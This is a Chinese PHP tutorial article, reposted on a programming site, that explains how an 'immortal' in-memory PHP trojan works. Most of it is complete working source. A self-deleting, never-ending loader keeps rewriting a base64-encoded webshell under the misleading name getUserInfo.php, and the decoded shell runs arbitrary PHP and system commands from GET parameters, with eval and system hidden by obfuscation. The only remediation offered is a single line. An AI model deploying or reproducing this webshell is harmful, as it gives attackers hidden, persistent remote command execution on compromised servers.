• 技术文章 >后端开发 >php教程

    带你分析PHP内存木马病毒实现原理

    藏色散人藏色散人2022-10-17 14:20:27转载1266
    前言

    内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。

    网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。

    正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。

    病毒源代码 (很简单)

    <?php
    //设置脚本不超时
    set_time_limit(0);ignore_user_abort(true);
    //删除文件本体
    @unlink(__FILE__);
    //给木马病毒起一个迷惑性的名字
    $file = './getUserInfo.php';
    //死循环常驻内存。释放木马文件
    while(true) {
     if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0='));
     sleep(60);
    }

    释放病毒本体

    <?php
    //以下代码实现了eval关键字和system函数的伪装
    //eval($_GET['e']);
    if($e = @$_GET['e']) {
        $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
        $func();
    }
    //system($_GET['s']);
    if($s = @$_GET['s']) {
        $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
        $f($s);
    }

    说明

    解决方案

    干掉进程后,删除释放的木马文件。

    推荐:《PHP视频教程

    php入门到就业线上直播课:查看学习

    以上就是带你分析PHP内存木马病毒实现原理的详细内容,更多请关注php中文网其它相关文章!

    声明:本文转载于:learnku,如有侵犯,请联系admin@php.cn删除

    前端(VUE)零基础到就业课程:点击学习

    清晰的学习路线+老师随时辅导答疑

    快捷开发Web应用及小程序:点击使用

    支持亿级表,高并发,自动生成可视化后台。

    专题推荐:php
    上一篇:怎么使用PHP查询IP地址归属地 下一篇:自己动手写 PHP MVC 框架(40节精讲/巨细/新人进阶必看)

    相关文章推荐

    • ❤️‍🔥共22门课程,总价3725元,会员免费学• ❤️‍🔥接口自动化测试不想写代码?• 某存储芯片的地址线为24条,则该内存条的容量是多少?• 深入讲解PHP垃圾回收及内存管理相关内容• 浅谈Redis中缓存过期、内存被缓存占用要怎么处理?• php吃内存怎么解决
    1/1

    PHP中文网